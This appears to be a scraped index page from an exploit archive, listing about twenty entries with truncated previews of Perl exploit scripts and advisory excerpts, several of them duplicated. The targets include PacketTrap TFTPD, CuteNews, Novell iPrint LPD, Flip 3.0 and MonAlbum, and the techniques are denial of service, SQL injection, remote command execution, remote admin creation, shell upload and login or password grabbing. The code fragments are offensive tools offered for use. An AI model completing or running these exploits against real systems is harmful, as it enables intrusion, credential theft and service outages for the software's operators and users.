PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl Jeremy Brown [email protected]/jbrownsec.blogspot.com PacketTrap TFTPD DoS latest 2.2.5459.0 tested -- www.packettrap.com Must have Net::TFTP installed easy to install, 'cpan' then 'install Net::TFTP' ; A product of tftpfuzz.pl coming soon use...

Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit

No description provided by source. !/usr/bin/perl Subdreamer 2.2.1 command exec exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ supported targets: without forum integration with phpBB2 integration with ipb2 integration with vbulletin2 integration...

CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...

Novell Iprint LPD Remote Code Execution Vulnerability

No description provided by source. !/usr/bin/perl Source: http://www.protekresearchlab.com/index.php?option=comcontent&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCKSTREAM; my $timeou...

Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10446/info Firebird is reported prone to a remote buffer-overrun vulnerability. The issue occurs because the application fails to perform sufficient boundary checks when the database server is handling database names. A...

Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10040/info Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly...

mPDF <= 5.3 file disclosure and fix-vulnerability warning-the black bar safety net

Title: mPDF = 5.3 File Disclosure Author: ZadYree Download address: http://www.mpdf1.com/mpdf/download Affected versions: 5.3 and prior Test platform: multiple !/ usr/bin/perl-U =head1 TITLE mPDF = 5.3 File Disclosure Exploit 0day =head2 SYNOPSIS -- examples/showcode.php --...

Novell Iprint LPD Remote Code Execution

!/usr/bin/perl Source: http://www.protekresearchlab.com/index.php?option=comcontent&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCKSTREAM; my $timeout = 1; my %opt; my $optstring =...

Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities

Exploit for windows platform in category dos / poc ====================================================================== Sysax Multi Server SFTP module Multiple Commands DoS Vulnerabilities ====================================================================== Title: Sysax Multi ServerSFTP modul...

Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Neversolved.pl Copyright c 2009 by jmp-esp.net A simple login grabber by lama - 06/23/2009 Tested on: Newsolved 1.1.6 use strict; use LWP::UserAgent; use Getopt::Std; use vars qw/ %opt /; getopts "i:p:u:lfh", %opt ; my @bugs =...

pktrp-dos.txt

!/usr/bin/perl Jeremy Brown [email protected]/jbrownsec.blogspot.com PacketTrap TFTPD DoS latest 2.2.5459.0 tested -- www.packettrap.com Must have Net::TFTP installed easy to install, 'cpan' then 'install Net::TFTP' ; A product of tftpfuzz.pl coming soon use Net::TFTP; use Getopt::Std; $tftp =...

phpnukekutubisitte-sql.txt

!/usr/bin/perl use Getopt::Std; use LWP::UserAgent; sub usg printf" --------------------------- | PHP-NUKE KutubiSitte kid = SQL Injection | --------------------------- Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 -------------- :::::::::::::::::::::::::::::...

MonAlbum 0.87 Upload Shell / Password Grabber Exploit

No description provided by source. !/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my %args, $user, $password, $sqlhost, $sqluser, $sqlpassword, $cookie, $path, $file, $upload = ; my $tmp = 'cmd1.jpg'; getopts"u:a:f:p:", %args; -a don't...

MonAlbum 0.87 - Arbitrary File Upload / Password Grabber

!/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my %args, $user, $password, $sqlhost, $sqluser, $sqlpassword, $cookie, $path, $file, $upload = ; my $tmp = 'cmd1.jpg'; getopts"u:a:f:p:", %args; -a don't retrieve login and passwords, use...

Flip 3.0 - Remote Admin Creation

Flip 3.0 - Remote Admin Creation !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admi...

Flip 3.0 - Remote Admin Creation

!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...

Flip &lt;= 3.0 Remoe Admin Creation Exploit

No description provided by source. !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip = 3.0"; my $type = "Admin Creation"; my $author = "undefined1"; my $vendor = "http://sourceforge.net/projects/flipsource"; my %opt; getopts"t:", %opt; $| = 1; print ":: $app $type - by...

Wireshark &lt; 0.99.5 - DNP3 Dissector Infinite Loop

!/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '192.168.4.52'; my $port = 20000; my...

HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print...

httpsv162-dos.txt

!/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print "HTTP SERVER httpsv1.6.2 404 Denial o...